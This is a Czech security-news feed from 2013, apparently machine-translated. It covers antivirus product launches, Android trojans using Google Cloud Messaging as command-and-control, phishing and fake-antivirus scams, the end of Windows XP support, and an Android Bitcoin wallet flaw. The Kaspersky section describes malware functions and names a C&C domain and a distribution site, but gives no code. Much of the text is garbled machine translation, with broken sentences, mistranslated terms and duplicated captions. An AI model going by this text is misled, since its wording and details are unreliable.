Navrženy tak, aby kompletní ochranu s minimálním dopadem na výkon počítače, nové Retail 2014 řešení využívají všechny výhody cloud-based zabezpečení řešit všechny typy hrozeb z digitálního světa: viry, hackery, online podvody a krádežemi identity, v Kromě známých a neznámých hrozeb. Všechny produkty v nové sestavě jsou snadno použitelné, bezpečné, spotřebuje minimální PC zdrojů a jsou postaveny na kolektivní Panda Security Intelligence systému, kterou se prodlužuje jeho multiplatformní pokrytí. "Během Prvních šest měsíců roku 2013 bylo 17 procent více vzorků malwaru vytvořena než ve stejném období loňského roku, takže situace není jen nebezpečná, ale stupeň nebezpečnosti se zvyšuje každý měsíc, "vysvětluje Luis Corrons, technický ředitel PandaLabs v Panda Security . "V poslední době, Panda Security zaznamenal postupný nárůst útoků na mobilní platformy. Ačkoli tam jsou výrazně méně, než proti PC, Android se stal preferovaným Cyber-podvodníci" mobilní operační systém. Existuje stále více a více trojské koně a malware obecně, které se Výhodou těchto typů zařízení k infikování počítače při připojení k nim, "dodal Corrons. Hlavní inovace obsažené v 2014 Panda Security Retail škálu řešení patří multiplatformní ochranu, kterou Panda Global Protection 2014 for Windows (XP, Vista, Windows 7 a Windows 8). Mac, Apple mobilní zařízení (iPad, iPhone a iPhone Touch) a Android (tablety, smartphony a dokonce i Smart TV) Určen pro uživatele s pokročilými potřebami, Panda Global Protection 2014 rozšiřuje vlastnosti, díky nimž Řešení jeden z nejlepších bezpečnostních balíků na trhu tím, že poskytuje vyšší ochranu proti neznámým malwarem a zvýšení stupně dezinfekce agresivního malwaru, jako ransomware nebo nepoctiví, která únosu počítače nebo osobní soubory. Identity Protection, anti-spam, rodičovskou kontrolu, zálohování, vzdálený přístup, optimalizace, šifrování souborů a modul pro správu hesel byly také optimalizovány. Panda Internet Security 2014 a Panda Antivirus Pro 2014 zvýšit své schopnosti před viry, hackery a dalšími hrozbami. Kromě těchto funkcí, Panda Internet Security 2014 také nabízí možnosti k ochraně rodiny, uživatel je identifikovat a uživatelská data pomocí rodičovské kontroly, vzdálený přístup, odstranění spamu a zálohování se soubor obnovení a další funkce. Panda Antivirus Pro nabízí rychlé a intuitivní prostředí a obsahuje firewall, virtuální klávesnice, domácí sítě, správa záchranný kit a multimediální možnosti a další funkce.
Zapněte jakékoli zařízení iOS do zabezpečené mobilní platby řešení
Publikováno dne 16. srpna 2013. Mobil | Zabezpečení | Viry
SecureNet platební systémy zahájena Mobilní PayOS , nejnovější mobilní platební technologie zmocňuje obchodníky všech velikostí, které promění jakoukoli iOS mobilní zařízení do zabezpečené mobilní platební řešení. Mobilní PayOS umožňuje podnikatelům rychle a snadno přijímat platby a spravovat jejich podnikání on-the-go. Securenet mobilního řešení zahrnuje zdarma mobilní aplikace a plně šifrované čtečku karet, k dispozici pro mobilní iOS dnes, a brzy Android. SecureNet nabízí 24 / 7. živá, US-založené podporu a umožňuje rychlé a snadné pro obchodníky začít používat mobilní PayOS. Poskytovat podnikům více obchodních příležitostí, Mobilní PayOS dává obchodníkům možnost přijímat platby debetní a kreditní kartou a sledovat platby v hotovosti všude v USA, pomocí libovolného mobilního iOS zařízení. Přizpůsobitelné zásob, daňové, obchodní reporting a řízení personálu nastavení umožňuje majitelům firem nastavit svůj mobilní sklad přesně tak, jak si přejí. Securenet mobilní PayOS umožňuje majitelům podniků s více zaměstnanci a míst rychle zvládnout, synchronizaci a sdílení zásoby a obchodní nastavení na více mobilních zařízení a PayOS spát zdravě vědomím jejich data jsou zálohována v cloudu. In-app zprávy o prodeji a Business Analytics umožňují obchodníkům rychle získat celkový přehled o jejich podnikání, kde jejich obchodní požadavky. aplikace pomáhá urychlit proces vypůjčování s inteligentním zásob třídění, jedné z kohoutku prodeje vstupenek míst, přizpůsobit zvratu hodnot a Okamžitý e-mail s příjmy transakce geo-umístění. Mobilní PayOS umožňuje také obchodníci a zaměstnanci zahájit úplné i částečné, bezproblémové náhrady přímo z aplikace. Prostřednictvím jediného, full-service obchodní účet, můžete Securenet obchodníci bezpečně přijmout místě prodeje, online a mobilní platby jako jejich podnikání roste a potřebuje změnit. SecureNet škálovatelnou obchodní účty umožňují podnikatelům řídit všechny aspekty své činnosti z jednoho místa a odstranit účetních bolesti hlavy s komplexní zprávy a konsolidované účetní závěrky, které dělají usmíření hračkou. "Jako nové prodejní kanály se objeví, zákazníci mají neomezené možnosti zvolit si, kdy a kde chtějí nakupovat. Představením nových obchodních příležitostí a urychlení cash flow, mobilní PayOS umožňuje obchodníkům všech velikostí spravovat a rozvíjet jejich podnikání on-the-go, "řekl Brent Warrington, generální ředitel SecureNet. "Ať point-of-sale, eCommerce nebo mobilní, musí obchodníci vyvíjejí a rozšířit své podnikání splnit zákazníkům, kde jsou nákupy. Jak karta bez přítomnosti karty a současnost světy sblížit a nutí podniky k posunu směrem k Omni-kanálový obchodní model, bude SecureNet nadále vyvíjet inovativní řešení platební technologie, které pomáhají obchodníci růst jejich podnikání. "
Secure robustní Android tablet pro vládu
Publikováno dne 15. srpna 2013 Mobil | Viry
Becrypt oznámila nové technologické partnerství s Getac poskytnout první zabezpečené Android Tablet řešení vhodné pro vojenské, obrany a vládě a veřejném sektoru trhy podle zodolněné zařízení Getac je.
Platforma založená na Android 4.1, je dodáván na plně robustní Getac tablety s vylepšenými bezpečnostními prvky, a bude poskytovat více bezpečný systém, ze kterého podporuje širokou škálu zakázkových aplikací, které vládní, vojenské a obranné trhy mohou používat s důvěrou. Peter Molyneux, prezident Getac Velké Británii řekl: "Naše robustní Android tablety spolu s Becrypt Špičkové možnosti zabezpečení nabízí výkonné řešení na trh. Becrypt má inovativní přístup k řešení bezpečnostních výzev, aby akreditované a flexibilní řešení. Společně naši zákazníci ve vládě, mohou vojenské, obranné a veřejného sektoru nám věřit poskytovat nejvyšší úroveň bezpečnosti, spolu s spolehlivé, robustní technologii k ochraně svých důvěrných a citlivých dat a řízení produktivity a výkonu. " Becrypt spolupracuje s Getac poskytovat bezpečnostní platformy jak pro Android a Windows 8 tablet (Becrypt již má CESG akreditovaný řešení pro tablety Windows 8), včetně šifrování zařízení, systém zpevnění, periferní kontrolu a centralizovanou správu, které významně zlepší schopnost ovládat zařízení, vynucení zásad zabezpečení, a poskytují auditní stopy a podávání zpráv při současném snížení podpory a údržby režii. Dr. Bernard Parsons, generální ředitel společnosti Becrypt, řekl: "Tablet přijetí roste bezpečnostní vědomé trhy a jsme hrdí na to, pracovat s Getac rozvíjet inovativní ještě praktická řešení, která chrání data, na různých tvarových faktorů, pro dnešek a pro budoucnost. Naše budoucnost připravené strategie se zaměřuje na dálkové nasazení a centralizovanou správu zařízení, která zajistí stejnou vysoký výkon a spolehlivost, které zákazníci očekávají od své notebooky s bonusem větší bezpečnost a snažší umožněn na základě nejnovějších mobilních technologií. "
GCM ve škodlivých příloh
14.8.2013 Mobil | Viry
Android OS nabízí zajímavou službu známou jako Google Cloud Messaging nebo VOM. Tato služba umožňuje malé (do 4 KB) zprávy, které mají být odeslány na server Google ze svých mobilních zařízení ve formátu JSON. Tyto zprávy mohou obsahovat žádná strukturovaná data, jako jsou například odkazy, Informace o inzerci, nebo příkazy.
Aby bylo možné používat tuto službu, musíte nejprve dostat vývojář jedinečné ID pro jeho aplikace, která bude použita k registraci aplikace s GCM. Po registraci může vývojář posílat data do všech zařízení, na kterém jsou nainstalovány registrované aplikace, nebo jen některé z nich.
Tato služba se používá k určení souřadnic ukradených telefonů, vzdálené nastavení telefonu, vysílají zprávy o vydání nových herních úrovní, nové produkty, a další.
Bylo by překvapivé, samozřejmě, pokud autoři virů se nesnažila využít příležitostí, které tuto službu. Zjistili jsme několik škodlivé programy, které používají GCM jako C & C.
Trojan-SMS.AndroidOS.FakeInst.a To je jeden z nejrozšířenějších hrozeb zaměřených na Android. Kaspersky Lab zjištěn v průběhu 4.800.000 instalátory pro tento trojan, a jen za poslední rok, Kaspersky Mobile Security (KMS) zablokoval více než 160.000 pokusů o instalaci.
Trojan mohou posílat textové zprávy na prémiová čísla, mazat příchozí textové zprávy, vytvářet zkratky na nebezpečné stránky a zobrazení oznámení reklamě jiné škodlivé programy, které se šíří pod rouškou užitečných aplikací či her.
Trojan je zaregistrován v systému GCM: Trojan můžete posílat placené SMS zprávy, když obdrží odpovídající příkazy: Trojan Fakelnst.a byla zjištěna ve více než 130 zemích světa. Jeho hlavní cíle jsou Rusko, Ukrajina, Kazachstán, a Uzbekistán.
Trojan-SMS.AndroidOS.Agent.ao Tento Trojan je převlečen za porno aplikace, ale ve skutečnosti se skládá z pouhých dvou snímků. Hlavním cílem tohoto Trojan je poslat prémiových textových zpráv. Kaspersky Lab zjištěn více než 300 instalátory pro tento trojan.
Tento Trojan používá GCM pro získání aktualizací:
Dále se také používá GCM vydávat příkazy posílat textové zprávy a vytvářet oznámení s informací nebo reklamní obsah v oznamovací oblasti:
Celkem KMS blokován přes 6000 pokusů o instalaci Trojan-SMS.AndroidOS.Agent.ao. Tento Trojan se zaměřuje především mobilní zařízení ve Velké Británii, kde byly zjištěny 90% všech infekcí pokoušel. Tato hrozba byla také zjištěna ve Švýcarsku, Íránu, Keni a Jižní Afriky.
Trojan-SMS.AndroidOS.OpFake.a Tato hrozba je klasický příklad Trojan SMS. Je množily v APK, pod rouškou množství aplikací, her, atd. Kaspersky Lab zjištěn více než milion různých instalátorů pro tento trojan.
Jakmile infiltroval mobilní zařízení, první věc, kterou udělá, je to Trojan kontaktujte jeho C & C: \ To pak registruje GCM: GCM a Trojan je C & C mají stejnou hodnost, pokud jde o odesílání příkazů.
Trojan má poměrně širokou škálu funkcí:
odesílání zpráv prémiové SMS na zadané číslo odesílání textových zpráv (typicky s odkazem na sobě nebo jinému ohrožení) na konkrétní číslo, typicky na čísla v seznamu kontaktů provádění self-aktualizace krást textové zprávy mazání příchozí textové zprávy, které splňují kritéria stanovená v C & C odcizení kontaktů nahrazovat C & C nebo GCM čísla zastavení nebo restartování svou činnost Pozoruhodné je, že při instalaci určitými modifikacemi tohoto Trojan, Android 4.2 varuje uživatele, že se jedná v podstatě o nebezpečnou aplikaci. Bohužel, to se nestane pro všechny úpravy. Společnost Kaspersky Lab zjistila tuto Trojan v 97 zemích. To je nejvíce často detekovány v Rusku, na Ukrajině, v Kazachstánu, Ázerbájdžánu, Běloruska a Uzbekistánu. KMS blokován přes 60.000 pokusí nainstalovat OpFake.a v těchto zemích.
Více než 1.000 pokusy instalace byly blokovány v Itálii a Německu.
Backdoor.AndroidOS.Maxit.a Kaspersky Lab poprvé zjištěn tento backdoor zpět na konci roku 2011 a nové úpravy byly vyneseny od té doby. V současné době existuje více než 40 variant tohoto ohrožení. Všechny tyto změny jsou velmi podobné navzájem, aplikace se otevře webové stránky s hrami, zatímco škodlivé operace se provádí v pozadí. První věc, kterou backdoor stanoví udělat, je shromažďovat informace o telefonu a SIM karty, včetně telefonního čísla a mobilního operátora. Všechna tato data se vkládají do androidproject.imaxter.net C & C. To je server, který spravuje všechny trojské primárních funkcí. Dále je ohrožení registrován GCM, který se pak používá jako dodatečný zdroj povelů: Backdoor je funkce se zaměřují především na tajně manipulace s funkcí textových zpráv, jako jsou odesílání, mazání a přesměrování příchozích zpráv. Kromě toho může být hrozbou také nainstalovat zkratky aniž by uživatel věděl, a nezávisle na otevřené webové stránky. To může také iniciovat telefonní hovory, i když tato akce vyžaduje potvrzení od uživatele.
Tato hrozba se šíří prostřednictvím internetových stránek http://www.momozaap.com/ .
Během uplynulého roku, KMS blokován téměř 500 pokusů instalace tohoto backdoor. Tento škodlivý program je detekován nejčastěji v Malajsii, a také byl zaznamenán v Thajsku, na Filipínách a Barmě.
Mimochodem, tato hrozba je kód zahrnuje Malajsie telefonní číslo. Toto číslo se nepoužívá nikde, ale uživatelé se zlými úmysly pravděpodobně chtít použít jako dodatečný zdroj povelů.
Trojan-SMS.AndroidOS.Agent.az Společnost Kaspersky Lab má Trojan-SMS.AndroidOS.Agent.az na jeho radaru od května 2012. Je to shell aplikace pro vietnamské porno stránkách, které také posílá textové zprávy prémiové číslo. V současné době již více než 1000 změn těchto aplikací byla zjištěna a v uplynulém roce sám KMS zablokovala více než 1500 pokusů instalací.
Trojan registruje GCM po uvádí: To pak otevře webové stránky s pornografickým videa: Dále pošle SMS na prémiové číslo.
Trojan používá GCM přijímat určité zprávy a přidat je do mobilního telefonu oznamovací části: Zřejmě protože Trojan jasně zaměřuje na uživatele ve Vietnamu (celý text se zobrazí uživateli, je v Vietnamese), naše testovací telefon s ruským číslem nikdy nedostal žádné zprávy. Zkušenosti však ukázaly, že dříve nebo později bude tento typ reklamy bude zaslán jinými škodlivými programy maskované jako užitečné aplikace nebo hry.
Tento Trojan byl zjištěn především ve Vietnamu, i když společnost Kaspersky Lab zjištěn také to v Rusku, Itálii, Indonésii a Malajsii.
Závěr I přesto, že současný počet škodlivých programů využívajících GCM je stále relativně nízká, některé z nich jsou velmi rozšířené. Tyto programy jsou převládající v některých zemích západní Evropy, SNS a Asie.
Není pochyb o tom, GCM je užitečná služba pro legitimní softwarové vývojáře. Ale autoři virů se pomocí Google Cloud Messaging jako další C & C pro své trojské koně. Kromě toho je provádění příkazů přijatých od GCM provádí GCM systému, a to je možné zablokovat přímo na infikované zařízení. Jediným způsobem, jak snížit tento kanál se od autoři virů je blokovat vývojáře účty s ID spojených s registrací škodlivých programů.
Kaspersky Lab již hlášena VOM ID nalezené být spojován s škodlivých programů na Google.
Nejnovější triky počítačových pirátů. Na co si dát pozor?
14.8.2013 Hacking | Kriminalita
Každý den vzniknou podle bezpečnostních expertů tisíce nových virů. A v jejich šíření jsou počítačoví piráti stále vynalézavější. Poctivě sledují, jaká témata uživatele na internetu nejvíce zajímají, a na ta se poté zaměřují. Například začátkem měsíce začaly kolovat sítí zprávy s novými informacemi o Angelině Jolie. Ta se před časem odhodlala k odstranění obou prsů, aby snížila riziko rakoviny.
1. Důležité jsou pravidelné aktualizace celého počítače. Ty je nutné stahovat pro operační systém, bezpečnostní bránu (firewall), antivirus i další programy. 2. Některé viry dokážou bezpečnostní software v PC zablokovat. Proto je vhodné pravidelně kontrolovat, zdali funguje. 3. Škodlivé programy se často šíří prostřednictvím nevyžádané pošty. Pokud nevíte od koho e-mail je, nikdy nestahujte jeho přílohu a neklikejte na žádné odkazy. 4. Pozor je nutné dávat na e-maily, v nichž odesílatel požaduje, abyste se přihlásili na nějakou webovou stránku a aktualizovali informace o vašem účtu. 5. Při zadávání přístupových hesel na internetových stránkách je nutné kontrolovat, zda je web zabezpečený. To poznáte například podle ikonky zámečku na liště internetového prohlížeče, nebo tak, že adresa webové stránky začíná zkratkou https, kde „s“ znamená bezpečná. 6. Citlivé osobní informace zadávejte vždy pouze na internetových stránkách, které bezpečně znáte. 7. Do e-mailů nepatří důvěrné informace, jako je například číslo kreditní karty nebo heslo k bankovnímu účtu. Elektronickou poštu totiž může zachytit útočník. 8. Firewall dovoluje lépe zabezpečit operační systém. Méně zkušení uživatelé by jej rozhodně neměli vypínat. Při nedostatečných znalostech je vhodné jej nechat pracovat v automatickém režimu. 9. V internetových kavárnách a na cizích počítačích se nepřihlašujte do internetového bankovnictví. V počítači mohou být nainstalované keyloggery. 10. Obezřetnost je nutná při připojení k nezašifrovaným bezdrátovým sítím. Ty totiž může kdokoliv odposlouchávat a získat tak přístup ke všem datům v cizím počítači. Dnes 11:57 „Spam přichází ve formě e-mailu údajně zaslaného CNN. Pokud kliknete na kterýkoli odkaz v e-mailu, budete vyzváni ke stažení souboru, který vypadá jako update pro Adobe Flash Player, ve skutečnosti se však jedná o nebezpečný malware,“ varoval bezpečnostní analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ. NIC.
Podobnou kampaň s nevyžádanou poštou kyberzločinci využili i ve chvíli, kdy se narodil potomek vévodkyně z Cambridge a prince Williama.
Maskované viry Kromě spamu piráti využívají také nejrůznější podvodné stránky i falešné dokumenty. Hackeři se snaží využít i snahy majitelů počítačů se před nimi chránit, proto se jim snaží podstrčit své viry v podobě antivirových programů zdarma. Na první pohled se tváří jako běžné produkty renomovaných firem, ve skutečnosti ale mají za úkol zmocnit se vlády nad napadeným PC.
Stále častěji jsou hrozby cíleny také na mobily a tablety, jejichž zabezpečení uživatelé na rozdíl od stolních PC podceňují.
„Dle naší laboratoře FotiGuard Labs došlo v uplynulém období ke třicetiprocentnímu nárůstu škodlivých kódů pro mobilní zařízení. Výzkumníci aktuálně analyzují 1300 nových kusů malware denně a sledují přes 300 unikátních skupin malware pro Android. Celkově pak přes čtvrt miliónu unikátních kusů malware,“ konstatoval Vladimír Brož ze společnosti Fortinet.
Podvodné antiviry cílí na mobily Vůbec poprvé zaznamenali bezpečnostní experti falešný antivirový program na chytrém telefonu. Tato sofistikovaná metoda cílí na majitele přístrojů s operačním systémem Android. Útok má vždycky stejný scénář.
„Falešný antivirový software používá škodlivý kód, který záměrně zkresluje stav zabezpečení mobilního zařízení a pokouší se přesvědčit uživatele ke koupi plné verze tohoto softwaru, aby došlo k odstranění neexistující infekce,“ varoval Johi Hamada ze společnosti Symantec.
Takto uzamčené zařízení není možné až do zaplacení „výkupného“ používat. Podobnou techniku útoku využívali kyberzločinci také na počítačových sestavách. „Podvodné antiviry jsou z osobních počítačů známé již řadu let a svým autorům vydělávají nemalé peníze. Autoři škodlivého kódu zjevně doufají, že stejný úspěch bude mít jejich hrozba i na mobilních zařízeních,“ konstatoval Hamada.
Na falešné antivirové programy, které často kopírují design i názvy aplikací renomovaných firem, by si uživatelé měli dávat velký pozor. Vhodné je stahovat bezpečnostní software výhradně z legitimních zdrojů a pokud možno také sledovat reakce uživatelů v diskusích na těchto serverech.
Erotická seznamka jen jako lákadlo „Hledáš nekomplikovanou schůzku?“ lákají v nové spamové kampani počítačoví piráti na údajně největší erotickou seznamku. Ve skutečnosti jde však o podvod.
Nevyžádaný e-mail působí poměrně věrohodně. Je totiž psaný srozumitelnou češtinou bez větších pravopisných chyb. Že jde o podvod, uživatel pozná až ve chvíli, kdy klikne na odkaz ve zprávě. „Odkaz v e-mailové zprávě míří na doménu mail3r.org. Součástí odkazu je také e-mailová adresa konkrétního uživatele,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT.
Počítačoví piráti lákají na erotickou Seznamku Počítačoví piráti lákají na erotickou
„Vzhledem k tomu, že na odkazované stránce nic není, jedná se s největší pravděpodobností o další trik útočníků, který má sloužit k ověření, zda je konkrétní e-mailová adresa používána,“ konstatoval Bašta.
Podle něj by uživatelé neměli na podobné zprávy vůbec reagovat a neklikat na odkazy ve zprávě. Není totiž vyloučeno, že pod odkazem se v budoucnu bude ukrývat nějaký škodlivý kód.
Falešné faktury na nesmyslné částky V poslední době se piráti vydávají za zaměstnance Applu a požadují uhrazení smyšlené faktury. Při tomto útoku využívají technik sociálního inženýrství, požadují uhrazení částky 700 USD (13 600 Kč) za pohlednice a počítají s tím, že takto vysokou sumu nebude chtít jejich oběť platit a naopak se bude snažit objednávku stornovat.
„Pokud se vám faktura a fakturovaná částka nezdá, pravděpodobně kliknete na jedno z uvedených odkazů pro zrušení objednávky. Proto je faktura na produkt, u kterého je nesmyslná cena. Útočník tak sází na to, že tuto fakturu určitě neakceptujete a budete ji chtít stornovat. Tím se ale dostáváte do další pasti,“ varoval bezpečnostní expert Esetu Petr Šnajdr.
Podvodná faktura, ve které se podvodníci vydávají za zaměstnance Applu Podvodná faktura, ve které se podvodníci vydávají za zaměstnance Applu
„Jakmile se stránka zobrazí, aktivuje se Blackhole Exploit kit, který se pokusí stáhnout malware, který dokáže zneužít chyby v produktech Oracle Java, Adobe Flash Player, Adobe Reader a napadnout počítač. Pokud se nepodaří zneužít počítač pomocí Blackhole Exploit kit, výše uvedená stránka přímo navede na stažení aktualizované verze prohlížeče, který stáhne do počítače malware v souboru update.exe,“ konstatoval Šnajdr.
Malware zaznamenává stisknuté klávesy a odesílá je útočníkovi. Ten se pak díky tomu může snadno dostat do internetového bankovnictví nebo e-mailu, který je na napadeném stroji využíván.
Soutěže mohou vyjít pěkně draho V Česku se v posledních týdnech začala rozmáhat nová internetová hrozba, prostřednictvím které podvodníci lákají důvěřivce na výhru hodnotných předmětů. Místo toho ale soutěžící zpláčou nad výsledkem a zadělají si akorát tak na problémy.
„HTML/Fraud je hrozba lákající na výhry v imaginárních soutěžích, většinou o produkty Apple. Uživatel, který poskytne své osobní údaje pro další využití nebo prodej, může očekávat pravidelný přísun prémiových SMS zpráv na svůj mobilní telefon,“ varoval bezpečnostní expert Esetu Petr Šnajdr.
Podle statistik antivirové společnosti Eset se tato hrozba umístila v minulém měsíci v žebříčku nejrozšířenějších škodlivých kódů na tuzemské síti na druhém místě. Její podíl tvořil nezanedbatelných 2,25 %.
Prvenství pak patřilo nezvanému návštěvníkovi, který se jmenuje Win32/Injector. AIMQ (6,53 %). Pomocí tohoto trojského koně mohou počítačoví piráti získat kontrolu nad cizím počítačem.
Ukončení podpory pro Windows XP bude ráj hackerů
Experti si myslí, že hackeři s vypuštěním zranitelností a zero-day pro Windows XP počkají, dokud Microsoft zastaralému operačnímu systému neukončí v dubnu příštího roku podporu.
Hrozby | Zabezpečení
Jason Fossen, expert na zabezpečení Microsoftu v úterý poznamenal, že je to ukázka ekonomiky v praxi. „Průměrná cena zranitelnosti na Windows XP se na černém trhu pohybuje kolem 50 až 150 tisíc dolarů. Je to relativně nízká cena, ve které se odráží přístup Microsoftu k opravám,“ řekl Fossen. Pokud se totiž ve Windows XP nějaká zranitelnost objeví, Microsoft ji začne okamžitě vyšetřovat a brzy vydá aktualizaci pro všechny uživatele. To se však v dubnu změní.
Microsoft přestane aktualizace pro Windows XP pro většinu uživatelů vydávat a nové záplaty tak získají pouze organizace, které za ně zaplatí.
„Pokud dnes někdo objeví spolehlivou zranitelnost v XP, která lze provést pomocí vzdáleného přístupu a vypustí ji dnes, Microsoft ji bude mít opravenou za pár týdnů,“ poznamenal Fossen. Když však počkají, cena se pravděpodobně zdvojnásobí.“
Pokud má Fossen pravdu, mělo by se to projevit v prudkém poklesu zveřejněných a použitých zranitelností během poslední čtvrtletí roku 2013 a začátkem roku 2014. Fossen zdůraznil, že mají hackeři k trpělivosti silnou motivaci.
Žádný příklad z minulosti, který by Fossenova slova potvrdil či vyvrátil, neexistuje. Když Microsoft ukončil v roce 2010 podporu pro Windows 2000, byl tento operační systém pouze na čtyřech desetinách procenta všech počítačů. XP mají podíl podstatně vyšší. Podle současných odhadů bude Windows XP v době ukončení podpory na 34% osobních počítačů.
Fossen je přesvědčen, že se Windows XP stanou lákavým a snadným cílem. Spekuluje také o tom, zda se tím Microsoft nedostane do takové pozice, kdy bude muset ze svého ultimáta vycouvat a aktualizaci přeci jenom vydat.
„Pokud si hackeři počkají a vypustí několik zero-days krátce za sebou, mohlo by to vytvořit takové problémy, že uživatelé budou aktualizaci vyžadovat opravdu hlasitě,“ řekl.
Mezi analytiky však panuje shoda v tom, že Microsoft ze svého rozhodnutí neustoupí. Nejen, že by to vytvořilo nevítaný precedent, navíc by si tím odstranil všechny páky, jak opozdilce přesvědčit k aktualizaci operačního systému na Windows 7 nebo 8.
Kaspersky aktualizuje své bezpečnostní řešení pro domácí uživatele 14. srpna 2013. Ochrany Kaspersky Lab vydala Kaspersky Anti-Virus 2014 a Kaspersky Internet Security 2014. Oba produkty jsou nyní ZETA Shield antivirovou technologii, která zajišťuje hloubkovou kontrolu souborů a aplikací spuštěných v počítači identifikovat malware, který může skrývat hluboko uvnitř jednotlivých složek každého programu. Kaspersky Lab nabízí další ochranu před novými hrozbami prostřednictvím své vylepšené automatické Exploit Prevention technologii, která prohledává programy pro chování obvykle nachází v činech -. druh malwaru, který infikuje počítač přes zranitelnosti legitimní software útoky typu phishing a trojské programy určené ukrást pověření pro on-line bankovních systémů jsou také mezi nejoblíbenější škodlivých nástrojů. Kaspersky Lab Bezpečné peníze technologie - poprvé představena v předchozí verzi aplikace Kaspersky Internet Security - již ukázala být mimořádně spolehlivé další vrstva ochrany on-line finančních operací. Tato technologie byla vylepšena v aplikaci Kaspersky Internet Security 2014, včetně podpory pro více webových prohlížečů, a podstatně rozšířeného seznamu důvěryhodných webů internetového bankovnictví, platebních služeb a on-line obchodů. Další významnou inovací Kaspersky Internet Security 2014 je jedinečné důvěryhodných aplikací režim . To chrání počítač tím, že povoluje pouze spuštění aplikací, které jsou označeny jako bezpečné pro použití. Díky multi-level systém, který kontroluje legitimitu programů a inteligentní systém, který lze přizpůsobit konkrétnímu uživateli, je tento režim schopen poskytnout velmi vysokou úroveň bezpečnosti. důvěryhodných aplikací funkce je založena na rozsáhlé a neustále aktualizovány Kaspersky Lab Whitelisting databáze legitimní aplikace. Databáze obsahuje více než 700 milionů unikátních záznamů s důkladným popisem všech populárních aplikací, včetně operačních systémů, prohlížečů, prohlížeče obrázků, přehrávače videa, hry a další. Pro uživatele s dětmi, Kaspersky Internet Security 2014 nabízí vylepšené funkce rodičovské kontroly, které poskytují flexibilní Ovládání přes všechny možné scénáře, ve kterém dítě může používat počítač. Tento režim obsahuje sadu výchozích profilů, které obsahují počítačové použití scénáře vhodné pro různé věkové skupiny, zatímco ještě dává rodičům svobodu změnit tato nastavení podle svého uvážení. Rodičovská kontrola umožňuje rodičům zjistit, kdy a jak dlouho mohou děti používat počítač které aplikace může nebo nemůže být spuštěn, a jaké informace - jako jsou čísla kreditních karet a domácí adresy - by měly být blokovány byly sdíleny na sociálních sítích.
Hacking inteligentní žárovky systém
14. srpna 2013.Hacking Fenomén internetu věcí (Internet věcí) je pozitivně ovlivňovat naše životy rozšiřovat naše prostory s inteligentními a připojených zařízení. Příklady těchto zařízení jsou žárovky, pohybová čidla, dveřní zámky, video kamery, termostaty a zásuvky. Do roku 2022 bude průměrná domácnost se dvěma dospívajícími dětmi vlastnit zhruba 50 takových zařízení připojená k Internetu, podle odhadů Organizace pro hospodářskou spolupráci a rozvoj -Provoz a rozvoj. Naše společnost se začíná stále více záviset na zařízení internetu věcí na podporu automatizace a zvýšit náš blahobyt. Jako takový, to je důležité, že jsme začali dialog o tom, jak můžeme bezpečně povolit nadcházející technologie. Nitesh Dhanjani prováděl výzkum na osvětlení Philips odstín systému. Odstín osobní Bezdrátový systém je k dispozici pro nákup z Apple Store a dalších prodejen. Po vybalení z krabice, systém se skládá z bezdrátových LED žárovek a bezdrátovým mostem. Žárovky lze nakonfigurovat tak, aby každý z 16 milionů barev. Vydal papír , který popisuje Největší nebezpečí spojené s výrobkem kromě podrobnou analýzu toho, jak systém funguje.
Počítačoví zločinci "šetřit" vlnu útoků Windows XP, kdy Microsoft přestane podporovat Napsal: 12.08.2013 22:58 PDT Zranitelnosti | Hrozby Počítačoví zločinci se rozpoutá vlnu "zero-day" zranitelnosti k útoku na systém Windows XP stroje po 08.04.2014, bezpečnostní expert prohlásil. Microsoft se zastaví uvolněním aktualizace zabezpečení pro operační systém k tomuto datu.
Zločinci budou "sedět" těchto chyb až do uvedeného data, aby více peněz ze svých činů, v souladu s Jasonem Fossen vzdělávacích SANS bezpečnostní firmy.
V současné době jsou chyby opravené Microsoft. Po dubnu se pouze společností, které platí pro vlastní podpory může být chráněn - a až třetina organizací se očekává, že i nadále používat systém Windows XP stroje.
"Průměrná cena na černém trhu za zneužití systému Windows XP je 50.000 dolarů 150.000 dolarů - relativně nízká cena, která odráží Microsoft odpověď," řekl Fossen, mluví k ComputerWorld.
"Když někdo zjistí, velmi spolehlivý, vzdáleně spustitelného XP zranitelnosti, a publikuje dnes, bude společnost Microsoft záplatu během několika týdnů. Ale když sedí na zranitelnosti, cenu za to mohlo velmi dobře double. "
Fossen práce je založena na stále značného počtu osobních počítačů používajících systém Windows XP.
Windows XP, který vyšel v roce 2001, je stále druhý nejvíce populární verze Windows - 38,7% osobních počítačů používaných XP od druhého čtvrtletí letošního roku, podle NetMarketShare.
ComputerWorld se předpokládá, že 33 - 34% bude stále spustit operační systém, kdy Microsoft přestane oprav to. To je v ostrém kontrastu, Fossen říká, na nízká čísla v prostředí Windows 2000, když to bylo vysloužilé v červenci 2010 - čtyři desetiny z 1%, v závislosti na monitorování pevných Net Applications. Dokonce tak, tam byly zprávy s nulovými dnů zaměřených na systém Windows 2000, kdy odešel do důchodu, podle zprávy Computerworld.
Výzkum Camwood, britský poradenství v oblasti softwaru, našel již dříve v tomto roce jen 42% firem se systémem Windows XP začali proces migrace.
Společnost Microsoft doporučuje ponechat alespoň 18 měsíců migrovat. Jeden z pěti IT dotázaných uvedla, že mají v úmyslu pokračovat v používání operačního systému, přestože si byli vědomi rizik.
ESET podcast nabízí některé nové bezpečnostní tipy pro stárnoucí OS zde.
Postu Počítačoví zločinci "šetřit" vlna Windows XP napadne, když Microsoft přestane podpora poprvé objevil na Žijeme zabezpečení.
Bitcoin peněženky "v ohrožení", díky Android chyby zabezpečení Napsal: 12.08.2013 12:04 PDT Mobil | Hacking | Zranitelnosti Bezpečnostní chyba opustil všechny Bitcoin peněženky na Android náchylné k odcizení, Bitcoin.org varoval.
Tato chyba zabezpečení se týká všech Bitcoin peněženky na Android plaform a Bitcoin.org reccomends, že všichni uživatelé navštívit Google Play úložiště k instalaci aktualizace, jakmile budou k dispozici jeden. Některé aplikace již byly aktualizovány, ale některé ne. Bitcoin.org neučinil žádné prohlášení o tom, zda všichni uživatelé mají ztracených kvůli zranitelnosti.
"Nedávno jsme se dozvěděli, že součástí Android odpovědné za generování náhodných čísel zabezpečených obsahuje kritické nedostatky, které je činí vše Android peněženky vytvořené k dnešnímu dni ohroženy krádeží," Bitcoin.org uvedl v prohlášení.
